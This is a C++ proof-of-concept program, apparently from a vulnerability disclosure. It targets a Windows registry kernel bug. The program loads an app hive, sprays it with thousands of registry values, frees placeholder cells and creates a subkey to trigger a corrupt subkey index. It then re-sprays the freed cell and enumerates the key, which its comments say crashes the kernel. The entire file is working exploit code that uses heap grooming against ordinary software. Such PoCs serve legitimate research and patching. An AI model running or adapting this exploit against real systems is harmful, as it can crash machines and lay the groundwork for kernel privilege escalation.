#include <Windows.h>

#include <cstdio>

int main(int argc, char **argv) {
  if (argc != 2) {
    printf("Usage: %s <hive file>\n", argv[0]);
    return 1;
  }

  //
  // Load the input app hive.
  //

  HKEY hAppKey;
  LSTATUS st;

  st = RegLoadAppKeyA(argv[1], &hAppKey, KEY_ALL_ACCESS, 0, 0);

  if (st != ERROR_SUCCESS) {
    printf("RegLoadAppKeyA failed with error %d\n", st);
    return 1;
  }

  //
  // Create placeholder values in the root of the hive, which will be used to
  // make room for reallocations later in the process.
  //

  CONST SIZE_T kPlaceholderSize1 = 0x3F70;
  CONST SIZE_T kPlaceholderSize2 = 0x58 + 0x10 + 0x1FC0 + 0x18;
  CONST SIZE_T kMaxPlaceholderSize = max(kPlaceholderSize1, kPlaceholderSize2);

  PBYTE chPlaceholderBuffer = (PBYTE)malloc(kMaxPlaceholderSize);

  if (chPlaceholderBuffer == NULL) {
    printf("malloc(%zu) failed\n", kMaxPlaceholderSize);
    return 1;
  }

  memset(chPlaceholderBuffer, 0xCC, kMaxPlaceholderSize);

  st = RegSetValueExW(hAppKey,
                      L"Placeholder1",
                      0,
                      REG_BINARY,
                      chPlaceholderBuffer,
                      kPlaceholderSize1);

  if (st != ERROR_SUCCESS) {
    printf("RegSetValueExW failed with error %d\n", st);
    return 1;
  }

  st = RegSetValueExW(hAppKey,
                      L"Placeholder2",
                      0,
                      REG_BINARY,
                      chPlaceholderBuffer,
                      kPlaceholderSize2);

  if (st != ERROR_SUCCESS) {
    printf("RegSetValueExW failed with error %d\n", st);
    return 1;
  }

  //
  // Pre-create the value nodes to minimize fragmentation of cells during
  // spraying, and to arrive at a stable key value index that won't be
  // reallocated later.
  //

  CONST ULONG kSprayValues = 4096;

  printf("Pre-creating registry spray values...\n");

  for (ULONG i = 0; i < kSprayValues; i++) {
    WCHAR chValueName[10];
    _snwprintf_s(chValueName, sizeof(chValueName), L"%.8x", i);

    st = RegSetValueExW(hAppKey,
                        chValueName,
                        0,
                        REG_BINARY,
                        (const BYTE*)"AAAA",
                        4);

    if (st != ERROR_SUCCESS) {
      printf("RegSetValueExW failed with error %d\n", st);
      return 1;
    }
  }

  //
  // Allocate space in the hive by creating values of descending length, up
  // to the point where there is no room left in the hive for new allocations.
  //

  CONST ULONG kMaxValueSize = 1024 * 1024;  // 1 MiB
  PBYTE chValueData = (PBYTE)malloc(kMaxValueSize);

  if (chValueData == NULL) {
    printf("malloc(%u) failed\n", kMaxValueSize);
    return 1;
  }

  memset(chValueData, 0xCC, kMaxValueSize);

  ULONG ulSprayAllocSize = kMaxValueSize, ulTotalSpraySize = 0;
  ULONG ulSprayIndex;

  printf("Spraying registry with size %u...\n", ulSprayAllocSize);

  for (ulSprayIndex = 0; ulSprayAllocSize > 8; ulSprayIndex++) {
    WCHAR wchValueName[10];
    _snwprintf_s(wchValueName, sizeof(wchValueName), L"%.8x", ulSprayIndex);

    st = RegSetValueExW(hAppKey,
                        wchValueName,
                        0,
                        REG_BINARY,
                        chValueData,
                        ulSprayAllocSize - 4);

    if (st == ERROR_SUCCESS) {
      ulTotalSpraySize += ulSprayAllocSize;
    } else {
      ulSprayAllocSize /= 2;
      printf("Spraying registry with size %u...\n", ulSprayAllocSize);
    }
  }

  printf("Registry sprayed with a total of 0x%x bytes\n", ulTotalSpraySize);

  //
  // Free a controlled amount of space in the hive by releasing the backing
  // buffers of the placeholder values.
  //

  st = RegSetValueExW(hAppKey, L"Placeholder1", 0, REG_BINARY, NULL, 0);

  if (st != ERROR_SUCCESS) {
    printf("RegSetValueExW failed with error %d\n", st);
    return 1;
  }

  st = RegSetValueExW(hAppKey, L"Placeholder2", 0, REG_BINARY, NULL, 0);

  if (st != ERROR_SUCCESS) {
    printf("RegSetValueExW failed with error %d\n", st);
    return 1;
  }

  //
  // Add one more subkey to the test key, thus triggering the index splitting
  // process and the bug itself.
  //

  HKEY hSubKey;

  st = RegCreateKeyExW(hAppKey,
                       L"SubKey",
                       0,
                       NULL,
                       0,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hSubKey,
                       NULL);

  if (st != ERROR_NO_SYSTEM_RESOURCES) {
    printf("RegCreateKeyExW failed with error %d (expected "
           "ERROR_NO_SYSTEM_RESOURCES)\n", st);
    return 1;
  }

  //
  // Repeat the hive spraying process again in order to fill all available hive
  // cells, including the freed cell currently being pointed to by the root's
  // subkey list index.
  //

  ulSprayAllocSize = 0x100, ulTotalSpraySize = 0;

  printf("Spraying registry with size %u...\n", ulSprayAllocSize);

  for (; ulSprayAllocSize > 8; ulSprayIndex++) {
    WCHAR wchValueName[10];
    _snwprintf_s(wchValueName, sizeof(wchValueName), L"%.8x", ulSprayIndex);

    st = RegSetValueExW(hAppKey,
                        wchValueName,
                        0,
                        REG_BINARY,
                        chValueData,
                        ulSprayAllocSize - 4);

    if (st == ERROR_SUCCESS) {
      ulTotalSpraySize += ulSprayAllocSize;
    } else {
      ulSprayAllocSize -= 0x8;
      printf("Spraying registry with size %u...\n", ulSprayAllocSize);
    }
  }

  printf("Consumed an additional 0x%x bytes of hive space\n", ulTotalSpraySize);

  //
  // Enumerate the key, which should cause a kernel crash as a result of
  // operating on a corrupt subkey index.
  //

  DWORD cchKeyName = 0;
  RegEnumKeyExA(hAppKey, 0, NULL, &cchKeyName, NULL, NULL, NULL, NULL);

  //
  // Cleanup.
  //

  free(chValueData);
  free(chPlaceholderBuffer);
  RegCloseKey(hAppKey);

  return 0;
}
